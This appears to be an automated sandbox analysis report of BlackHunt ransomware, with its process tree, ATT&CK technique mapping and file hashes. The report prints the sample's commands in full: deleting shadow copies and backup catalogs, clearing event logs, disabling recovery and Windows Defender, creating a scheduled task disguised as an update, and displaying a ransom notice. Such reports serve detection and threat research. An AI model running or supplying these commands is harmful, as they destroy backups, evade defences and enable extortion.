      "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
      PID:2088

        C:\Windows\system32\fsutil.exe
          fsutil.exe usn deletejournal /D C:
          - Deletes NTFS Change Journal
          PID:9872

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
      PID:4680

        C:\Windows\system32\schtasks.exe
          schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
          PID:9932

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
      PID:4804

        C:\Windows\system32\wbadmin.exe
          wbadmin.exe delete catalog -quiet
          - Deletes backup catalog
          PID:9916
    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
      PID:1320

        C:\Windows\system32\reg.exe
          reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
          PID:4996

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
      PID:8

        C:\Windows\system32\bcdedit.exe
          bcdedit /set {default} recoveryenabled No
          - Modifies boot configuration data using bcdedit
          PID:8860

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
      PID:2368

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe" /F
      PID:4328

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
      PID:1092

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
      PID:2312

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
      PID:1912

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
      PID:1320

        C:\Windows\system32\bcdedit.exe
          bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
          - Modifies boot configuration data using bcdedit
          PID:9084

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
      PID:4332

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
      PID:3664

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
      - Suspicious use of WriteProcessMemory
      PID:4460

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
      - Suspicious use of WriteProcessMemory
      PID:5020

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
      - Suspicious use of WriteProcessMemory
      PID:4800

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      - Suspicious use of WriteProcessMemory
      PID:2996

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      - Suspicious use of WriteProcessMemory
      PID:2876

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
      - Suspicious use of WriteProcessMemory
      PID:2436

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      - Suspicious use of WriteProcessMemory
      PID:3272

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
      - Suspicious use of WriteProcessMemory
      PID:4008
    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\
      PID:9832

        C:\Windows\system32\fsutil.exe
          fsutil usn deletejournal /D F:\
          - Enumerates connected drives
          PID:3256

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\
      PID:6844

        C:\Windows\system32\fsutil.exe
          fsutil usn deletejournal /D C:\
          PID:10132

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\
      PID:9424

        C:\Windows\system32\fsutil.exe
          fsutil usn deletejournal /D M:\
          - Enumerates connected drives
          PID:4644

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup
      PID:3724

        C:\Windows\system32\wevtutil.exe
          wevtutil.exe cl Setup
          - Clears Windows event logs
          - Suspicious use of AdjustPrivilegeToken
          PID:7244

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System
      PID:5164

        C:\Windows\system32\wevtutil.exe
          wevtutil.exe cl System
          - Clears Windows event logs
          - Suspicious use of AdjustPrivilegeToken
          PID:8672

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application
      PID:9668

        C:\Windows\system32\wevtutil.exe
          wevtutil.exe cl Application
          - Clears Windows event logs
          - Suspicious use of AdjustPrivilegeToken
          PID:8384

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security
      PID:9728

        C:\Windows\system32\wevtutil.exe
          wevtutil.exe cl Security
          - Clears Windows event logs
          - Suspicious use of AdjustPrivilegeToken
          PID:9972

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false
      PID:6992

        C:\Windows\system32\wevtutil.exe
          wevtutil.exe cl Security /e:false
          - Clears Windows event logs
          - Suspicious use of AdjustPrivilegeToken
          PID:10048
    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
      PID:8752

        C:\Windows\system32\vssadmin.exe
          vssadmin.exe Delete Shadows /all /quiet
          - Interacts with shadow copies
          PID:7704

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
      PID:5064

        C:\Windows\system32\bcdedit.exe
          bcdedit /set {default} recoveryenabled No
          - Modifies boot configuration data using bcdedit
          PID:14820

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
      PID:7612

        C:\Windows\system32\bcdedit.exe
          bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
          - Modifies boot configuration data using bcdedit
          PID:13828

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
      PID:10000

        C:\Windows\system32\fsutil.exe
          fsutil.exe usn deletejournal /D C:
          - Deletes NTFS Change Journal
          PID:8696

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
      PID:9776

        C:\Windows\system32\schtasks.exe
          schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
          PID:6084

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
      PID:8260

        C:\Windows\system32\wbadmin.exe
          wbadmin.exe delete catalog -quiet
          - Deletes backup catalog
          PID:5156
    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
      PID:5616

        C:\Windows\system32\reg.exe
          REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
          PID:5472

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
      PID:7948

        C:\Windows\system32\reg.exe
          reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
          PID:14564

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
      PID:7248

        C:\Windows\system32\schtasks.exe
          SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
          PID:13624

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
      PID:13288

        C:\Windows\system32\reg.exe
          REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
          PID:20016

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
      PID:7456

        C:\Windows\system32\reg.exe
          reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
          PID:2276

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f
      PID:6876

        C:\Windows\system32\taskkill.exe
          taskkill /IM mshta.exe /f
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
          PID:5352

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
      PID:17900

        C:\Windows\system32\notepad.exe
          notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
          PID:18900

    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta
      - Checks computer location settings
      - Modifies registry class
      PID:7984

        C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
          PID:4544

            C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 4544 -s 1460
              - Program crash
              PID:5920

    C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe"
      PID:7336

        C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          - Runs ping.exe
          PID:12828
C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
  - Modifies registry class
  PID:4544

C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
  - Modifies registry class
  PID:2196

C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
  - Modifies registry class
  PID:1932

C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
  - Modifies registry class
  PID:2948

C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
  PID:208

C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
  PID:3256

C:\Windows\system32\vssvc.exe
  C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  PID:1112

C:\Windows\system32\vssadmin.exe
  vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
  - Interacts with shadow copies
  PID:4844

C:\Windows\system32\schtasks.exe
  SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\2d712bb2b38bf78e8e766bedeacec377fef8c873548f1aa5ac3eb710b1aec6be.exe" /F
  - Creates scheduled task(s)
  PID:2816

C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
  PID:4800

    C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
      PID:3776

C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
  PID:1808

C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
  PID:3972

C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
  PID:4216

C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
  PID:3388

C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
  PID:2844

C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  PID:2312

C:\Windows\system32\wbengine.exe
  "C:\Windows\system32\wbengine.exe"
  - Suspicious use of AdjustPrivilegeToken
  PID:9496

C:\Windows\System32\vdsldr.exe
  C:\Windows\System32\vdsldr.exe -Embedding
  PID:10328

C:\Windows\System32\vds.exe
  C:\Windows\System32\vds.exe
  - Checks SCSI registry key(s)
  PID:13028

C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4544 -ip 4544
  PID:7868
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Impair Defenses (2)
  - Disable or Modify Tools (2)
- Indicator Removal (4)
  - File Deletion (3)
- Modify Registry (5)
Downloads
- Filesize 1KB
  MD5 accdeab4a07a6154df3bcb1490094daf
  SHA1 3387dc22176c8614a4688c0700801afe96411694
  SHA256 acae702e8e7a3a68e58f62c3b310c1ec995972afbc5e4f6f6bd6692195eb7aa5
  SHA512 d6c0905c18c4b5beacc83757e4a267bdaaa22b78fb2ef384562d8ec835538e35610aa9aace06e607c91176fd5b3a052be5cac215ee944ee41b7a0ac48e4a5450
- Filesize 12KB
  MD5 ce2213552841fea3e2b4ebcd894258ed
  SHA1 a5111896ec9884ed42c8c16f29410050e9023d5b
  SHA256 eae5ab0b8843329caca1f2789d115ee3f6d2f0cfee2ccde940d1c9cdc19cca3b
  SHA512 5692726f078ca9be085e35fd90d91814aec9ccb896a7444bf4c1e2a64ebe6a3235f477f5bb201410e2646374f473088eba39bed60be425b630895285be7bd521
- Filesize 684B
  MD5 a436088125df3f44ba98c45886a62282
  SHA1 606593fb439df3509c47a7768f85dc29820b7644
  SHA256 345d6585256edfc9d6e79b0217a3f0cc1d7d2b0fc08ebea406d7d78c2dc6536a
  SHA512 86ce714a09d45eecc3584d224e4673f7fb0a80781903d36478933265b7727dac5f48c6e198fdacc26c7530626cabccf559c659f8ada751b75ff0733dd4a79984